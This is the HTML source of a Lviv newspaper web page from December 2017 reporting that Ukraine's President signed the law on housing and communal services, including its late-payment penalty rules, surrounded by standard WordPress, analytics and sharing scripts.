<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=1280">
    <title>Президент підписав закон «Про житлово-комунальні послуги» - Львівська газета</title>
	<link rel="icon" href="http://gazeta.lviv.ua/wp-content/themes/gazeta/favicon.ico" type="image/x-icon"></link> 
	<link rel="shortcut icon" href="http://gazeta.lviv.ua/wp-content/themes/gazeta/favicon.ico" type="image/x-icon"></link>
	
<!-- This site is optimized with the Yoast SEO plugin v5.3.3 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://gazeta.lviv.ua/2017/12/06/prezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi/" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Він повинен демонополізувати сферу житлово-комунальних послуг і підвищити їх якість «Документом осучаснюються правові, економічні та організаційні засади надання споживачам житлово-комунальних послуг, а також запроваджуються новітні моделі договірних взаємовідносин між споживачами та виконавцями послуг, побудовані на принципах відкритості, прозорості та взаємної" />
<meta name="twitter:title" content="Президент підписав закон «Про житлово-комунальні послуги» - Львівська газета" />
<meta name="twitter:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/12/de311d317b2e314fe165bcc54c7f8617_1451228533_extra_large.jpeg" />
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/gazeta.lviv.ua\/","name":"\u041d\u0430\u0439\u0441\u0432\u0456\u0436\u0456\u0448\u0456 \u043d\u043e\u0432\u0438\u043d\u0438 \u043c\u0456\u0441\u0442\u0430 \u041b\u044c\u0432\u043e\u0432\u0430 \u0442\u0430 \u0423\u043a\u0440\u0430\u0457\u043d\u0438 \u0432 \u0440\u0435\u0436\u0438\u043c\u0456 \u043e\u043d\u043b\u0430\u0439\u043d - \u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u0430 \u0433\u0430\u0437\u0435\u0442\u0430","alternateName":"\u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u0456 \u043d\u043e\u0432\u0438\u043d\u0438 \u0449\u043e\u0445\u0432\u0438\u043b\u0438\u043d\u0438. \u041e\u0441\u0442\u0430\u043d\u043d\u0456 \u043d\u043e\u0432\u0438\u043d\u0438 \u043f\u043e\u043b\u0456\u0442\u0438\u043a\u0438, \u0435\u043a\u043e\u043d\u043e\u043c\u0456\u043a\u0438, \u0441\u043f\u043e\u0440\u0442\u0443 \u0442\u0430 \u043a\u0443\u043b\u044c\u0442\u0443\u0440\u0438. \u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u0430 \u0433\u0430\u0437\u0435\u0442\u0430 \u043e\u043d\u043b\u0430\u0439\u043d","potentialAction":{"@type":"SearchAction","target":"http:\/\/gazeta.lviv.ua\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//s.gravatar.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Львівська газета &raquo; Президент підписав закон «Про житлово-комунальні послуги» Канал коментарів" href="http://gazeta.lviv.ua/2017/12/06/prezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/gazeta.lviv.ua\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.4"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b!==c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='realmodals-css'  href='http://gazeta.lviv.ua/wp-content/plugins/real-kit/modules/modals/style.css?ver=4.8.4' type='text/css' media='all' />
<link rel='stylesheet' id='archives-cal-calendrier-css'  href='http://gazeta.lviv.ua/wp-content/plugins/archives-calendar-widget/themes/calendrier.css?ver=1.0.12' type='text/css' media='all' />
<link rel='stylesheet' id='wp-pagenavi-css'  href='http://gazeta.lviv.ua/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<link rel='stylesheet' id='fonts-css'  href='https://fonts.googleapis.com/css?family=Fira+Sans%3A400%2C400i%2C500%2C500i%2C700%2C700i%7COpen+Sans%3A400%2C400i%2C700%2C700i%7CPT+Sans%3A400%2C400i%2C700%2C700i%7CPT+Serif%3A400%2C400i%2C700%2C700i&#038;ver=4.8.4' type='text/css' media='all' />
<link rel='stylesheet' id='awesome-css'  href='http://gazeta.lviv.ua/wp-content/themes/gazeta/css/font-awesome.min.css?ver=4.8.4' type='text/css' media='all' />
<link rel='stylesheet' id='theme-style-css'  href='http://gazeta.lviv.ua/wp-content/themes/gazeta/style.css?ver=4.8.4' type='text/css' media='all' />
<link rel='stylesheet' id='gk-nsp-css'  href='http://gazeta.lviv.ua/wp-content/plugins/gk-nsp/gk-nsp.css?ver=4.8.4' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://gazeta.lviv.ua/wp-includes/css/dashicons.min.css?ver=4.8.4' type='text/css' media='all' />
<link rel='stylesheet' id='thickbox-css'  href='http://gazeta.lviv.ua/wp-includes/js/thickbox/thickbox.css?ver=4.8.4' type='text/css' media='all' />
<link rel='stylesheet' id='et-builder-modules-style-css'  href='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/styles/frontend-builder-plugin-style.css?ver=1.2.3' type='text/css' media='all' />
<link rel='stylesheet' id='magnific-popup-css'  href='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/styles/magnific_popup.css?ver=1.2.3' type='text/css' media='all' />
<link rel='stylesheet' id='A2A_SHARE_SAVE-css'  href='http://gazeta.lviv.ua/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.14' type='text/css' media='all' />
<link rel='stylesheet' id='fancybox-css'  href='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.8.min.css?ver=1.6' type='text/css' media='screen' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://gazeta.lviv.ua/wp-content/plugins/jetpack/css/jetpack.css?ver=5.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/real-kit/modules/modals/script.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.0'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/archives-calendar-widget/admin/js/jquery.arcw-init.js?ver=1.0.12'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/themes/gazeta/js/jquery.cycle.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/themes/gazeta/js/theme-script.js?ver=4.8.4'></script>
<link rel='https://api.w.org/' href='http://gazeta.lviv.ua/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://gazeta.lviv.ua/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://gazeta.lviv.ua/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.8.4" />
<link rel='shortlink' href='http://wp.me/p874c2-Hlj' />
<link rel="alternate" type="application/json+oembed" href="http://gazeta.lviv.ua/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F12%2F06%2Fprezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://gazeta.lviv.ua/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F12%2F06%2Fprezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi%2F&#038;format=xml" />

<script type="text/javascript">
var a2a_config=a2a_config||{};a2a_config.callbacks=a2a_config.callbacks||[];a2a_config.templates=a2a_config.templates||{};a2a_localize = {
	Share: "Share",
	Save: "Save",
	Subscribe: "Subscribe",
	Email: "Email",
	Bookmark: "Bookmark",
	ShowAll: "Show all",
	ShowLess: "Show less",
	FindServices: "Find service(s)",
	FindAnyServiceToAddTo: "Instantly find any service to add to",
	PoweredBy: "Powered by",
	ShareViaEmail: "Share via email",
	SubscribeViaEmail: "Subscribe via email",
	BookmarkInYourBrowser: "Bookmark in your browser",
	BookmarkInstructions: "Press Ctrl+D or \u2318+D to bookmark this page",
	AddToYourFavorites: "Add to your favorites",
	SendFromWebOrProgram: "Send from any email address or email program",
	EmailProgram: "Email program",
	More: "More&#8230;"
};

</script>
<script type="text/javascript" src="https://static.addtoany.com/menu/page.js" async="async"></script>
<meta property="fb:app_id" content="1083471841726549"/>
<link rel='dns-prefetch' href='//v0.wordpress.com'>
<style type='text/css'>img#wpstats{display:none}</style><link rel="amphtml" href="http://gazeta.lviv.ua/2017/12/06/prezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi/amp/" />
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Президент підписав закон «Про житлово-комунальні послуги»" />
<meta property="og:url" content="http://gazeta.lviv.ua/2017/12/06/prezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi/" />
<meta property="og:description" content="Він повинен демонополізувати сферу житлово-комунальних послуг і підвищити їх якість" />
<meta property="article:published_time" content="2017-12-06T10:21:18+00:00" />
<meta property="article:modified_time" content="2017-12-06T10:56:48+00:00" />
<meta property="og:site_name" content="Львівська газета" />
<meta property="og:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/12/de311d317b2e314fe165bcc54c7f8617_1451228533_extra_large.jpeg" />
<meta property="og:image:width" content="1024" />
<meta property="og:image:height" content="682" />
<meta property="og:locale" content="uk_UA" />
<meta name="twitter:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/12/de311d317b2e314fe165bcc54c7f8617_1451228533_extra_large.jpeg?w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- Easy FancyBox 1.6 using FancyBox 1.3.8 - RavanH (http://status301.net/wordpress-plugins/easy-fancybox/) -->
<script type="text/javascript">
/* <![CDATA[ */
var fb_timeout = null;
var fb_opts = { 'overlayShow' : true, 'hideOnOverlayClick' : true, 'showCloseButton' : true, 'margin' : 20, 'centerOnScroll' : true, 'enableEscapeButton' : true, 'autoScale' : true };
var easy_fancybox_handler = function(){
	/* IMG */
	var fb_IMG_select = 'a[href*=".jpg"]:not(.nolightbox,li.nolightbox>a), area[href*=".jpg"]:not(.nolightbox), a[href*=".jpeg"]:not(.nolightbox,li.nolightbox>a), area[href*=".jpeg"]:not(.nolightbox), a[href*=".png"]:not(.nolightbox,li.nolightbox>a), area[href*=".png"]:not(.nolightbox), a[href*=".webp"]:not(.nolightbox,li.nolightbox>a), area[href*=".webp"]:not(.nolightbox)';
	jQuery(fb_IMG_select).addClass('fancybox image');
	var fb_IMG_sections = jQuery('div.gallery ');
	fb_IMG_sections.each(function() { jQuery(this).find(fb_IMG_select).attr('rel', 'gallery-' + fb_IMG_sections.index(this)); });
	jQuery('a.fancybox, area.fancybox, li.fancybox a').fancybox( jQuery.extend({}, fb_opts, { 'transitionIn' : 'elastic', 'easingIn' : 'easeOutBack', 'transitionOut' : 'elastic', 'easingOut' : 'easeInBack', 'opacity' : false, 'hideOnContentClick' : false, 'titleShow' : true, 'titlePosition' : 'over', 'titleFromAlt' : true, 'showNavArrows' : true, 'enableKeyboardNav' : true, 'cyclic' : false }) );
}
var easy_fancybox_auto = function(){
	/* Auto-click */
	setTimeout(function(){jQuery('#fancybox-auto').trigger('click')},1000);
}
/* ]]> */
</script>
	



</head>
<body  class="post-template-default single single-post postid-166613 single-format-standard  et_divi_builder"> 


<script>
        (function (i, s, o, g, r, a, m) {
            i['GoogleAnalyticsObject'] = r;
            i[r] = i[r] || function () {
                (i[r].q = i[r].q || []).push(arguments)
            }, i[r].l = 1 * new Date();
            a = s.createElement(o),
                    m = s.getElementsByTagName(o)[0];
            a.async = 1;
            a.src = g;
            m.parentNode.insertBefore(a, m)
        })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');

        ga('create', 'UA-75408624-1', 'auto');
        ga('send', 'pageview');

    </script>

	<div id="wrapper">
        <header id="header">
        	<div class="center">
            	<div class="header-panel clearfix">
                	                    <div class="top-slides">
                    	<ul id="top-slides-list">
                        	                            <li>
                            	                                <a href="http://gazeta.lviv.ua/2017/12/05/novorichno-rizdvyani-zaxodi-u-lvovi-vzhe-startuvali-programa/">
                                                                	<span class="thumb"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/12/c20_6-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></span>
                                    <span class="caption"><span class="cell">Новорічно-різдвяні заходи у Львові вже стартували (програма)</span></span>
								                                </a>
                                                            </li>
                                                        <li>
                            	                                <a href="http://gazeta.lviv.ua/2017/12/06/minuloyi-dobi-leleki-prinesli-u-lvivski-rodini-23-nemovlyat/">
                                                                	<span class="thumb"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/12/parens_1-1024x585-1-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></span>
                                    <span class="caption"><span class="cell">Минулої доби лелеки принесли у львівські родини 23 немовлят</span></span>
								                                </a>
                                                            </li>
                                                    </ul>
                    </div>
                                        <div class="header-panel-right">
                    	                        <ul class="header-socials">
                        	<li class="mobile-swatch"><a href="/2017/12/06/prezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi/?mobile_switch=mobile" title="Версія для мобільних"><i class="fa fa-mobile"></i></a></li>
							<li><a href="http://facebook.com/lvivskagazeta/" target="_blank"><i class="fa fa-facebook"></i></a></li>                                                        <li><a href="https://www.youtube.com/channel/UCJiKZoY0vRxONsAgIuzNcuQ" target="_blank"><i class="fa fa-youtube-play"></i></a></li>                                                        <li><a href="http://gazeta.lviv.ua/feed/" target="_blank"><i class="fa fa-feed"></i></a></li>                        </ul>
                        <div class="header-radio"><aside id="custom_html-2" class="widget_text all-devices  widget_custom_html"><div class="textwidget custom-html-widget"><a href="http://www.galychyna.fm/" target="_blank"><img src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/galychyna.jpg" alt="FM Галичина"></a></div></aside></div>
                    </div>
                    <div class="logo_block">
                		                    	<a id="logo" href="http://gazeta.lviv.ua" title="Львівська газета"><img src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/logo.png" alt="Львівська газета"></a>
                	</div>
                </div><!-- end header-panel -->
                <div class="header-main">
                	<div class="gray-row clearfix">
                    	<ul id="menu-main-menu" class="main_menu"><li id="menu-item-160249" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-160249"><a href="http://gazeta.lviv.ua/"><i class="fa fa-home"></i></a></li>
<li id="menu-item-239" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-239"><a href="http://gazeta.lviv.ua/novini/">Новини</a></li>
<li id="menu-item-160269" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160269"><a href="http://gazeta.lviv.ua/interview/">Інтерв&#8217;ю</a></li>
<li id="menu-item-160270" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160270"><a href="http://gazeta.lviv.ua/specprojects/">Спецпроекти</a></li>
<li id="menu-item-242" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-242"><a href="http://gazeta.lviv.ua/foto/">Фото-відео</a></li>
<li id="menu-item-130196" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-130196"><a href="http://gazeta.lviv.ua/blogi/">Блоги</a></li>
</ul>                        <div class="header-search"><div class="search-block">
    <form method="get" id="searchform" action="http://gazeta.lviv.ua/">
        <input type="text" class="input-search" placeholder="Пошук" name="s" id="s" value="" />
        <button type="submit" class="submit-search" name="submit" id="searchsubmit"><i class="fa fa-search"></i></button>
    </form>
</div></div>
                    </div>
                    <div class="white-row clearfix">
                    	<ul id="menu-news-menu" class="news_menu"><li id="menu-item-160318" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160318"><a href="http://gazeta.lviv.ua/politika-2/">Політика</a></li>
<li id="menu-item-160250" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160250"><a href="http://gazeta.lviv.ua/ekonomika-2/">Бізнес</a></li>
<li id="menu-item-160254" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160254"><a href="http://gazeta.lviv.ua/novini/suspilstvo/">Суспільство</a></li>
<li id="menu-item-160251" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160251"><a href="http://gazeta.lviv.ua/kultura/">Культура</a></li>
<li id="menu-item-160252" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160252"><a href="http://gazeta.lviv.ua/lyudi-lvova/">Люди Львова</a></li>
<li id="menu-item-160273" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160273"><a href="http://gazeta.lviv.ua/stil-zhittya/">Стиль життя</a></li>
</ul>                        <div class="header-weather">

                            <div class="weather-date">6 грудня 2017</div>
                            <div id="gsInformerID-ghJYhjkE8h5tGb" class="gsInformer" style="width:173px;height:87px">
                              <div class="city">у Львові</div>
                              <div class="gsIContent">
                                <div id="cityLink">
                                    <a href="https://www.gismeteo.ua/ua/weather-lviv-4949/" title="Погода у Львові" target="_blank">
                                        <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода у Львові">
                                    </a>
                                </div>
                                <div class="gsLinks" style="display:none;"></div>
                              </div>
                            </div>
                            <script src="https://www.gismeteo.ua/ajax/getInformer/?hash=ghJYhjkE8h5tGb" type="text/javascript"></script>
                        </div>
                    </div>
                </div><!-- end header-main -->
            </div>
       	</header>
        <div class="center">
        	<div class="header-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><a href="http://www.khmilclinic.lviv.ua/novyny-ta-aktsii/aktsii/246-aktsiya-povtorna-sproba-ekz-mykolaia.html" target="_blank"><img width="728" height="90" src='http://gazeta.lviv.ua/wp-content/uploads/2017/12/khmil.gif' alt='' title='khmil' /></a></aside></div><!-- end header-ads-wrap -->
        </div>
		<div id="container">  
        	            <div class="center">
            
	<div class="content_section gray-border clearfix">
        <div class="column_main">
            <div class="column_center">
                				<div class="single-content">
                    <div class="post-header clearfix">
                        <h1>Президент підписав закон «Про житлово-комунальні послуги»</h1>
<!--start-->
                                                <div class="subtitle">Він повинен демонополізувати сферу житлово-комунальних послуг і підвищити їх якість</div>
                                                <div class="item-meta">
                            <time class="item-date" datetime="">12:21, Ср. - 06 Гру. 2017</time>
                            &nbsp;|&nbsp;
                            <span class="item-author"></span>
                            &nbsp;<span class="item-views"><i class="fa fa-eye"></i> 240</span>
                            &nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/12/06/prezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi/"></span>
                        </div>
                        <div class="share-block"><div class="addtoany_shortcode"><div class="a2a_kit a2a_kit_size_24 addtoany_list" data-a2a-url="http://gazeta.lviv.ua/2017/12/06/prezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi/" data-a2a-title="Президент підписав закон «Про житлово-комунальні послуги»"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F12%2F06%2Fprezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi%2F&amp;linkname=%D0%9F%D1%80%D0%B5%D0%B7%D0%B8%D0%B4%D0%B5%D0%BD%D1%82%20%D0%BF%D1%96%D0%B4%D0%BF%D0%B8%D1%81%D0%B0%D0%B2%20%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%20%C2%AB%D0%9F%D1%80%D0%BE%20%D0%B6%D0%B8%D1%82%D0%BB%D0%BE%D0%B2%D0%BE-%D0%BA%D0%BE%D0%BC%D1%83%D0%BD%D0%B0%D0%BB%D1%8C%D0%BD%D1%96%20%D0%BF%D0%BE%D1%81%D0%BB%D1%83%D0%B3%D0%B8%C2%BB" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F12%2F06%2Fprezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi%2F&amp;linkname=%D0%9F%D1%80%D0%B5%D0%B7%D0%B8%D0%B4%D0%B5%D0%BD%D1%82%20%D0%BF%D1%96%D0%B4%D0%BF%D0%B8%D1%81%D0%B0%D0%B2%20%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%20%C2%AB%D0%9F%D1%80%D0%BE%20%D0%B6%D0%B8%D1%82%D0%BB%D0%BE%D0%B2%D0%BE-%D0%BA%D0%BE%D0%BC%D1%83%D0%BD%D0%B0%D0%BB%D1%8C%D0%BD%D1%96%20%D0%BF%D0%BE%D1%81%D0%BB%D1%83%D0%B3%D0%B8%C2%BB" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_google_plus" href="https://www.addtoany.com/add_to/google_plus?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F12%2F06%2Fprezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi%2F&amp;linkname=%D0%9F%D1%80%D0%B5%D0%B7%D0%B8%D0%B4%D0%B5%D0%BD%D1%82%20%D0%BF%D1%96%D0%B4%D0%BF%D0%B8%D1%81%D0%B0%D0%B2%20%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%20%C2%AB%D0%9F%D1%80%D0%BE%20%D0%B6%D0%B8%D1%82%D0%BB%D0%BE%D0%B2%D0%BE-%D0%BA%D0%BE%D0%BC%D1%83%D0%BD%D0%B0%D0%BB%D1%8C%D0%BD%D1%96%20%D0%BF%D0%BE%D1%81%D0%BB%D1%83%D0%B3%D0%B8%C2%BB" title="Google+" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd a2a_counter addtoany_share_save" href="https://www.addtoany.com/share"></a></div></div></div>
                    </div>


							                            <div class="wp-caption">
                            	<a href="http://gazeta.lviv.ua/wp-content/uploads/2017/12/de311d317b2e314fe165bcc54c7f8617_1451228533_extra_large.jpeg"><img width="1024" height="682" src="http://gazeta.lviv.ua/wp-content/uploads/2017/12/de311d317b2e314fe165bcc54c7f8617_1451228533_extra_large.jpeg" class="attachment-large size-large wp-post-image" alt="" srcset="http://gazeta.lviv.ua/wp-content/uploads/2017/12/de311d317b2e314fe165bcc54c7f8617_1451228533_extra_large.jpeg 1024w, http://gazeta.lviv.ua/wp-content/uploads/2017/12/de311d317b2e314fe165bcc54c7f8617_1451228533_extra_large-500x333.jpeg 500w" sizes="(max-width: 1024px) 100vw, 1024px" /></a>
                                                                <p class="wp-caption-text">http://www.president.gov.ua</p>
                                                            </div>
                            



                    <div class="single-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Банер в статті -->
<ins class="adsbygoogle"
     style="display:inline-block;width:468px;height:60px"
     data-ad-client="ca-pub-9951724072058821"
     data-ad-slot="4322344197"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></aside></div>
                    <div class="item-entry text">
					<p>«Документом осучаснюються правові, економічні та організаційні засади надання споживачам житлово-комунальних послуг, а також запроваджуються новітні моделі договірних взаємовідносин між споживачами та виконавцями послуг, побудовані на принципах відкритості, прозорості та взаємної відповідальності», &#8211; зазначають на сайті <a href="http://www.president.gov.ua">Президента.</a></p>
<p>Закон також визначає перелік житлово-комунальних послуг, загальні вимоги щодо їх надання, порядок оплати за них, а також зміни та припинення договорів.</p>
<p>В документів також ідеться про<a href="http://gazeta.lviv.ua/2017/11/09/za-nevchasno-oplachenu-komunalku-dovedetsya-platiti-penyu/"> пеню</a> за невчасно оплачену комуналку. З 1 січня 2019 року її будуть нараховувати за кожний протермінований день.</p>
<p>Однак,  якщо людина невчасно отримала заробітну плату за конкретний місяць, документальне підтвердження цього звільнить її від штрафу.</p>
<div class="addtoany_share_save_container addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_24 addtoany_list" data-a2a-url="http://gazeta.lviv.ua/2017/12/06/prezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi/" data-a2a-title="Президент підписав закон «Про житлово-комунальні послуги»"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F12%2F06%2Fprezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi%2F&amp;linkname=%D0%9F%D1%80%D0%B5%D0%B7%D0%B8%D0%B4%D0%B5%D0%BD%D1%82%20%D0%BF%D1%96%D0%B4%D0%BF%D0%B8%D1%81%D0%B0%D0%B2%20%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%20%C2%AB%D0%9F%D1%80%D0%BE%20%D0%B6%D0%B8%D1%82%D0%BB%D0%BE%D0%B2%D0%BE-%D0%BA%D0%BE%D0%BC%D1%83%D0%BD%D0%B0%D0%BB%D1%8C%D0%BD%D1%96%20%D0%BF%D0%BE%D1%81%D0%BB%D1%83%D0%B3%D0%B8%C2%BB" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F12%2F06%2Fprezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi%2F&amp;linkname=%D0%9F%D1%80%D0%B5%D0%B7%D0%B8%D0%B4%D0%B5%D0%BD%D1%82%20%D0%BF%D1%96%D0%B4%D0%BF%D0%B8%D1%81%D0%B0%D0%B2%20%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%20%C2%AB%D0%9F%D1%80%D0%BE%20%D0%B6%D0%B8%D1%82%D0%BB%D0%BE%D0%B2%D0%BE-%D0%BA%D0%BE%D0%BC%D1%83%D0%BD%D0%B0%D0%BB%D1%8C%D0%BD%D1%96%20%D0%BF%D0%BE%D1%81%D0%BB%D1%83%D0%B3%D0%B8%C2%BB" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_google_plus" href="https://www.addtoany.com/add_to/google_plus?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F12%2F06%2Fprezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi%2F&amp;linkname=%D0%9F%D1%80%D0%B5%D0%B7%D0%B8%D0%B4%D0%B5%D0%BD%D1%82%20%D0%BF%D1%96%D0%B4%D0%BF%D0%B8%D1%81%D0%B0%D0%B2%20%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%20%C2%AB%D0%9F%D1%80%D0%BE%20%D0%B6%D0%B8%D1%82%D0%BB%D0%BE%D0%B2%D0%BE-%D0%BA%D0%BE%D0%BC%D1%83%D0%BD%D0%B0%D0%BB%D1%8C%D0%BD%D1%96%20%D0%BF%D0%BE%D1%81%D0%BB%D1%83%D0%B3%D0%B8%C2%BB" 